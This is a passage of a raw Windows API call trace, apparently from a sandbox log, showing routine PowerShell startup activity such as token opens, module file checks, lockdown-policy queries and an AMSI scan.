0x39 [0227.615] GetCurrentProcess () returned 0xffffffffffffffff [0227.615] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fd188 | out: TokenHandle=0x1b7fd188*=0x68c) returned 1 [0227.616] GetCurrentProcess () returned 0xffffffffffffffff [0227.616] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fd188 | out: TokenHandle=0x1b7fd188*=0x690) returned 1 [0227.617] GetCurrentProcess () returned 0xffffffffffffffff [0227.617] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fcf88 | out: TokenHandle=0x1b7fcf88*=0x694) returned 1 [0227.618] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1b7fd040 | out: lpFileInformation=0x1b7fd040*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.618] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", nBufferLength=0x105, lpBuffer=0x1b7fc9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config", lpFilePart=0x0) returned 0x40 [0227.618] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe.config"), fInfoLevelId=0x0, lpFileInformation=0x1b7fd028 | out: lpFileInformation=0x1b7fd028*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0227.619] GetCurrentProcess () returned 0xffffffffffffffff [0227.619] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fd188 | out: TokenHandle=0x1b7fd188*=0x698) returned 1 [0227.620] GetCurrentProcess () returned 0xffffffffffffffff [0227.620] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fd188 | out: TokenHandle=0x1b7fd188*=0x69c) returned 1 [0227.637] GetCurrentProcess () returned 0xffffffffffffffff [0227.637] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fced8 | out: TokenHandle=0x1b7fced8*=0x6a0) returned 1 [0227.701] GetCurrentProcess () returned 0xffffffffffffffff [0227.701] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fcee8 | out: TokenHandle=0x1b7fcee8*=0x6a4) returned 1 [0227.782] ReadFile (in: hFile=0x684, lpBuffer=0x26d91e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe388, lpOverlapped=0x0 | out: lpBuffer=0x26d91e0*, lpNumberOfBytesRead=0x1b7fe388*=0x8a2, lpOverlapped=0x0) returned 1 [0227.829] EtwEventRegister () returned 0x0 [0227.892] GetCurrentProcess () returned 0xffffffffffffffff [0227.892] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fdd28 | out: TokenHandle=0x1b7fdd28*=0x6ac) returned 1 [0227.894] GetCurrentProcess () returned 0xffffffffffffffff [0227.894] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x1b7fdd38 | out: TokenHandle=0x1b7fdd38*=0x6b0) returned 1 [0228.732] ReadFile (in: hFile=0x684, lpBuffer=0x26d91e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe358, lpOverlapped=0x0 | out: lpBuffer=0x26d91e0*, lpNumberOfBytesRead=0x1b7fe358*=0x0, lpOverlapped=0x0) returned 1 [0228.733] CloseHandle (hObject=0x684) returned 1 [0228.735] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fe330, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0228.736] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe7b0) returned 1 [0228.736] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x273d2f0 | out: lpFileInformation=0x273d2f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0228.737] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe770) returned 1 [0228.738] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x1b7fe260, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0228.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe6a0) returned 1 [0228.738] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe780 | out: lpFileInformation=0x1b7fe780*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x47e545ef, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x47e545ef, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0228.738] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe660) returned 1 [0228.738] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", nBufferLength=0x105, lpBuffer=0x1b7fe100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20", lpFilePart=0x0) returned 0x93 [0228.738] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fe5e0) returned 1 [0228.738] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_da21122d-ae44-4f93-ba1d-c9a978ca5b20" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_da21122d-ae44-4f93-ba1d-c9a978ca5b20"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x684 [0228.739] GetFileType (hFile=0x684) returned 0x1 [0228.739] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fe550) returned 1 [0228.739] GetFileType (hFile=0x684) returned 0x1 [0228.745] ReadFile (in: hFile=0x684, lpBuffer=0x2741538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe448, lpOverlapped=0x0 | out: lpBuffer=0x2741538*, lpNumberOfBytesRead=0x1b7fe448*=0x1000, lpOverlapped=0x0) returned 1 [0229.621] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fcca8 | out: phkResult=0x1b7fcca8*=0x0) returned 0x2 [0229.621] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\XML", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fcca8 | out: phkResult=0x1b7fcca8*=0x0) returned 0x2 [0229.831] ReadFile (in: hFile=0x684, lpBuffer=0x2741538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe118, lpOverlapped=0x0 | out: lpBuffer=0x2741538*, lpNumberOfBytesRead=0x1b7fe118*=0x1000, lpOverlapped=0x0) returned 1 [0229.833] ReadFile (in: hFile=0x684, lpBuffer=0x2741538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fdd78, lpOverlapped=0x0 | out: lpBuffer=0x2741538*, lpNumberOfBytesRead=0x1b7fdd78*=0xb02, lpOverlapped=0x0) returned 1 [0229.839] ReadFile (in: hFile=0x684, lpBuffer=0x2741538, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fe418, lpOverlapped=0x0 | out: lpBuffer=0x2741538*, lpNumberOfBytesRead=0x1b7fe418*=0x0, lpOverlapped=0x0) returned 1 [0229.839] CloseHandle (hObject=0x684) returned 1 [0229.841] ReleaseMutex (hMutex=0x564) returned 1 [0229.845] CoCreateGuid (in: pguid=0x1b7fe878 | out: pguid=0x1b7fe878*(Data1=0x7424beea, Data2=0x24b1, Data3=0x4d14, Data4=([0]=0xb7, [1]=0x28, [2]=0x29, [3]=0x39, [4]=0xc5, [5]=0x3b, [6]=0xac, [7]=0x66))) returned 0x0 [0229.867] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x684 [0229.867] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x6b4 [0229.867] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6b8 [0229.867] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6bc [0229.867] SetEvent (hEvent=0x6bc) returned 1 [0229.868] SetEvent (hEvent=0x684) returned 1 [0229.868] SetEvent (hEvent=0x6b4) returned 1 [0229.868] SetEvent (hEvent=0x6b8) returned 1 [0229.868] AmsiCloseSession () returned 0x7ffb1cb78068 [0229.869] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x6c0 [0229.870] SetThreadUILanguage (LangId=0x0) returned 0x409 [0229.972] EtwEventActivityIdControl () returned 0x0 [0229.972] EtwEventActivityIdControl () returned 0x0 [0229.972] EtwEventActivityIdControl () returned 0x0 [0230.982] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0230.998] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fdb20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0230.998] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fdf60) returned 1 [0230.999] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fe040 | out: lpFileInformation=0x1b7fe040*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0230.999] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fdf20) returned 1 [0230.999] GetFileAttributesW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0231.001] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fd680, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.002] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b9e70 [0231.002] GetSystemDirectoryW (in: lpBuffer=0x1a9b9e70, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0231.002] CoTaskMemFree (pv=0x1a9b9e70) [0231.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0231.002] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7fd550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0231.002] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fd990) returned 1 [0231.002] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7fda70 | out: lpFileInformation=0x1b7fda70*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0231.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fd950) returned 1 [0231.002] WldpGetLockdownPolicy () returned 0x0 [0231.002] GetSystemInfo (in: lpSystemInfo=0x1b7fdad0 | out: lpSystemInfo=0x1b7fdad0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0231.003] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fd9d8 | out: phkResult=0x1b7fd9d8*=0x6a0) returned 0x0 [0231.003] RegQueryValueExW (in: hKey=0x6a0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7fda28, lpData=0x0, lpcbData=0x1b7fda20*=0x0 | out: lpType=0x1b7fda28*=0x0, lpData=0x0, lpcbData=0x1b7fda20*=0x0) returned 0x2 [0231.003] RegCloseKey (hKey=0x6a0) returned 0x0 [0231.011] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fd3c0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.011] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fd8a0) returned 1 [0231.011] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6a0 [0231.011] GetFileType (hFile=0x6a0) returned 0x1 [0231.011] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fd810) returned 1 [0231.011] GetFileType (hFile=0x6a0) returned 0x1 [0231.012] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fd858*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fd858*=0) returned 0x0 [0231.012] ReadFile (in: hFile=0x6a0, lpBuffer=0x2475da0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fd8d8, lpOverlapped=0x0 | out: lpBuffer=0x2475da0*, lpNumberOfBytesRead=0x1b7fd8d8*=0x950, lpOverlapped=0x0) returned 1 [0231.012] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fd858*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fd858*=0) returned 0x950 [0231.013] ReadFile (in: hFile=0x6a0, lpBuffer=0x2475258, nNumberOfBytesToRead=0x2b0, lpNumberOfBytesRead=0x1b7fd8d8, lpOverlapped=0x0 | out: lpBuffer=0x2475258*, lpNumberOfBytesRead=0x1b7fd8d8*=0x0, lpOverlapped=0x0) returned 1 [0231.013] SetFilePointer (in: hFile=0x6a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x1b7fd858*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x1b7fd858*=0) returned 0x950 [0231.013] ReadFile (in: hFile=0x6a0, lpBuffer=0x2475da0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1b7fd8d8, lpOverlapped=0x0 | out: lpBuffer=0x2475da0*, lpNumberOfBytesRead=0x1b7fd8d8*=0x0, lpOverlapped=0x0) returned 1 [0231.013] CoTaskMemAlloc (cb=0x20c) returned 0x1a9b9e70 [0231.013] GetSystemDirectoryW (in: lpBuffer=0x1a9b9e70, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0231.013] CoTaskMemFree (pv=0x1a9b9e70) [0231.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1b7fd210, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0231.013] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\wldp.dll", nBufferLength=0x105, lpBuffer=0x1b7fd3b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\wldp.dll", lpFilePart=0x0) returned 0x1c [0231.013] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fd7f0) returned 1 [0231.013] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll"), fInfoLevelId=0x0, lpFileInformation=0x1b7fd8d0 | out: lpFileInformation=0x1b7fd8d0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x13812212, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x13812212, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x13812212, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x9370)) returned 1 [0231.013] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fd7b0) returned 1 [0231.013] WldpGetLockdownPolicy () returned 0x0 [0231.013] GetSystemInfo (in: lpSystemInfo=0x1b7fd930 | out: lpSystemInfo=0x1b7fd930*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0231.014] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x1b7fd838 | out: phkResult=0x1b7fd838*=0x68c) returned 0x0 [0231.014] RegQueryValueExW (in: hKey=0x68c, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x1b7fd888, lpData=0x0, lpcbData=0x1b7fd880*=0x0 | out: lpType=0x1b7fd888*=0x0, lpData=0x0, lpcbData=0x1b7fd880*=0x0) returned 0x2 [0231.014] RegCloseKey (hKey=0x68c) returned 0x0 [0231.014] CloseHandle (hObject=0x6a0) returned 1 [0231.015] CoCreateGuid (in: pguid=0x1b7fd9e8 | out: pguid=0x1b7fd9e8*(Data1=0x8894ce5d, Data2=0x37f1, Data3=0x4102, Data4=([0]=0x8b, [1]=0x39, [2]=0x49, [3]=0x29, [4]=0xa5, [5]=0xce, [6]=0xcd, [7]=0x1f))) returned 0x0 [0231.022] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fd4a0, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.025] AmsiOpenSession () returned 0x0 [0231.025] AmsiScanString () returned 0x80070015 [0231.087] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fd000, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.089] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fcf70, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fd3b0) returned 1 [0231.089] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fd490 | out: lpFileInformation=0x1b7fd490*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0231.089] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fd370) returned 1 [0231.089] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fcf20, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.089] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fcd80, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.089] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fce50, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.089] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fd290) returned 1 [0231.089] GetFileAttributesExW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x1b7fd370 | out: lpFileInformation=0x1b7fd370*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f33bbf0, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f33bbf0, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f33bbf0, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x950)) returned 1 [0231.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fd250) returned 1 [0231.090] GetFullPathNameW (in: lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x105, lpBuffer=0x1b7fcd40, lpFilePart=0x0 | out: lpBuffer="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0231.090] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b7fd220) returned 1 [0231.090] CreateFileW (lpFileName="C:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x6a4 [0231.090] GetFileType (hFile=0x6a4) returned 0x1 [0231.090] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b7fd190) returned 1 [0231.090] GetFileType (hFile=0x6a4) returned 0x1 [0231.090] WTGetSignatureInfo () returned 0x0 